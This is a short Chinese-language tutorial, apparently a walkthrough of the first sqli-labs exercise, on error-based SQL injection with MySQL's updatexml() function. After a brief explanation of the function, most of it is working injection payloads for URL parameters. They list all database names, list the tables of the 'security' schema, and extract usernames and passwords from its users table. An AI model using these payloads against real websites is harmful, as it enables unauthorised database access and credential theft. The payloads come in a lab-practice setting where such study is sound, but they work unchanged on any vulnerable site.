less-1(報錯注入之updatexml)
1.updatexml()函數
![](https://img.laitimes.com/img/_0nNw4CM6IyYiwiM6ICdiwiI0gTMx81dsQWZ4lmZf1GLlpXazVmcvwFciV2dsQXYtJ3bm9CX9s2RkBnVHFmb1clWvB3MaVnRtp1XlBXe0xCMy81dvRWYoNHLwEzX5xCMx8FesU2cfdGLwMzX0xiRGZkRGZ0Xy9GbvNGLpZTY1EmMZVDUSFTU4VFRR9Fd4VGdsYTMfVmepNHLrJXYtJXZ0F2dvwVZnFWbp1zczV2YvJHctM3cv1Ce-cmbw5SMzgTM5Y2MjJWOxYWZmRjMzYzX1QTN1YDM3EzLclDMyIDMy8CXn9Gbi9CXzV2Zh1WavwVbvNmLvR3YxUjLyM3Lc9CX6MHc0RHaiojIsJye.png)
XML_document用法
把名為1.xml文檔的s更新成S
Updatexml(‘1.xml’,S,s)
2.爆破所有庫名
資料庫所有庫名
?id=1' and updatexml(1,concat(0x7e,(select substr(group_concat(schema_name),1,31) from information_schema.schemata)),1) -- -#字母限制僅能顯示31個
?id=1' and updatexml(1,concat(0x7e,(select substr(group_concat(schema_name),32,31) from information_schema.schemata)),1) -- -
?id=1' and updatexml(1,concat(0x7e,(select substr(group_concat(schema_name),63,31) from information_schema.schemata)),1) -- -
3.爆破security的表名
Security的所有表名
?id=1’ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’security’),0x7e),1)-- -
4.檢視users表的第三行資料
?id=1' and updatexml(1,concat(0x7e,(select concat(username,'~',password) from security.users limit 2,1)),1) -- -
?id=1' and updatexml(1,concat(0x7e,(select concat(username,'~',password) from security.users where id=3)),1) -- -